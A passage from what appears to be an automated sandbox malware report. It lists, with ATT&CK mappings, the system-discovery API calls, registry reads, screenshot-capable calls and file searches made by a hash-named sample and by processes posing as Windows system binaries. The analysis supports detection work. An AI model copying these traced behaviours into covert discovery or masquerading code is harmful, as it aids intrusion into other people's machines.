940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21b4301d01b43010016430100004001e414430188000000880000001768887798174301ff2b88778c5fa177a41b4301ac011d0000001d0000004001c06d400114009800b1020000c06d400150164301100000000000000015009300b1020000c06d4001 (UID: 00000000-00005284)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bb201d01bb2010016b2010000af01e414b2018800000088000000176888779817b201ff2b88778f5da177a41bb201ac012b0000002b000000af01c06daf011200a200fb040000c06daf015016b201100000000000000013009d00fb040000c06daf01 (UID: 00000000-00000908)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bc201d01bc2010016c2010000bf01e414c2018800000088000000176888779817c201ff2b8877af56a177a41bc201ac012800000028000000bf01c06dbf0114009800b1020000c06dbf015016c201100000000000000015009300b1020000c06dbf01 (UID: 00000000-00005432)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a00100005a1b4e01581b4e0188154e0100004b016c144e0188000000880000001768887720174e01ff2b8877b848a1772c1b4e01ac011a0000001a0000004b01905b4b011000ac003c040000905b4b01d8154e0110000000000000001100a7003c040000905b4b01 (UID: 00000000-00005232)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21b3801d01b38010016380100003501e414380188000000880000001768887798173801ff2b88775e4fa177a41b3801ac0120000000200000003501c06d35011400980047020000c06d35015016380110000000000000001500930047020000c06d3501 (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebdc7550e924000050fd7f9a5c897700f0fd7f60c612004450fd7f00000000400000003f000000200000000050fd7f54c61200c15c897760829077200000000050fd7f9a5c897700f0fd7f78c61200578988778083907713179175d8ebdc75 (UID: 00000000-00003448)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bc401d01bc4010016c4010000c101e414c4018800000088000000176888779817c401ff2b8877104fa177a41bc401ac011e0000001e000000c101c06dc10114009800b1020000c06dc1015016c401100000000000000015009300b1020000c06dc101 (UID: 00000000-00002104)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059887798010000a0010000d21bc001d01bc0010016c0010000bd01e414c0018800000088000000176888779817c001ff2b88776444a177a41bc001ac012000000020000000bd01c06dbd011200a200db040000c06dbd015016c001100000000000000013009d00db040000c06dbd01 (UID: 00000000-00004752)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005620)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005244)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005348)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005364)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005916)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005284)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000908)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005432)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005232)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003448)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000806b2c0068da1200b344806b81d022760000000000000000000000000000000000000000000000001401000000000000000000000000000051129826f75a7e2624df12005ecb20761401000000000000005d1e7680e112000e5d1e7618dd1200dcaa2276010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360033129826f8da12006d82e8751c652c0004010000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370065003600610061003700650038003800640065003900310035003700630066003400370039003400320035003500630036003100340062006400390034003600650032006200350033006100650035006200360063003700330031006400390036002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b887765aca077d8ebdc75ac0128000000280000000000000000000300ed00c9000000000000000000000000000000000000000400e800c900000000000000000000003870280000000000200000000000000000000000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000280001000000ffffffff020000000800000088602d0088602d0083602d000000000002000000b88f2a0000000000010000080000000068ec120095e18477ed7b3a00feffffffe0d912003f08f77602000000b88f2a00000000000100001888fbf676d0d91200c81c2276a6db120095fbf67604db1200b88f2a000000000000000000000000008cda1200000028007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c71298264cda12006d82e8751c652c0004010000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600af1b982664d312006d82e87574642d0004010000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000038ca2d00b8cf1200b344806b81d022760000000000000000000000000000000000000000000000007401000000000000000000000000000081079826874f7e2674d412005ecb20767401000000000000005d1e76d0d612000e5d1e7668d21200dcaa227601000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c318982648d012006d82e8753c6a2d0004010000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00003b00000000280000000000506c2d00accf12000464887738012800e063887702000000b88f2a000000000001000008ed7b3a00feffffffbcc79077c0c790770a000000a00f000000002800286a2d00f83b0000ff07000000002800d8bf2e007f070000d8bf2e00083028000b0a00005ccf120067e5857700002800286a2d000000000000002800000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600970798269ccf12006d82e8753c6a2d0004010000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00d06a2d00cb6a2d0000000000000000000000280000000001e4cb12000000000048d9120095e18477ed7b3a00feffffff435c887750598877aa000000b8000000ca6a2d00c86a2d006ccd1200a4d1120000000000000000000000000000000000000000000000000000000000000000001c5c877760d89075ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096ed8877f26a2d00a06a5e75860000006ccd1200a4d112000000000086008800a06a5e756ccd1200916c5e75f26a2d00a06a5e75a06a5e75dcd1120002020000 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005136)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005404)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000078a51e0068da1200b344806b81d0227600000000000000000000000000000000000000000000000018010000000000000000000000000000088c7922db2b5d2524df12005ecb20761801000000000000005d1e7680e112000e5d1e7618dd1200dcaa2276010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600698d7922f8da12006d82e875dc741f0004010000 (UID: 00000000-00005404)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005404)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"IsWow64Process\" with parameter \"5136\" - (UID: 00000000-00005136)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5404\" - (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"5412\" - (UID: 00000000-00005412)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"5156\" - (UID: 00000000-00005156)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5628\" - (UID: 00000000-00005628)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"5808\" - (UID: 00000000-00005808)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"3448\" - (UID: 00000000-00003448)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"5072\" - (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005620)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005324)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005244)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005348)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005364)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005916)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005284)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000908)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005432)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005232)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003448)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002104)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004752)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005636)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005520)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001288)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006012)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005836)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005072)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005756)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005700)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005136)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005412)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005136)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"GetWindowTextA\" (UID: 00000000-00005136)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00005412)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"D3_08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"ab0106da\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005136)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called 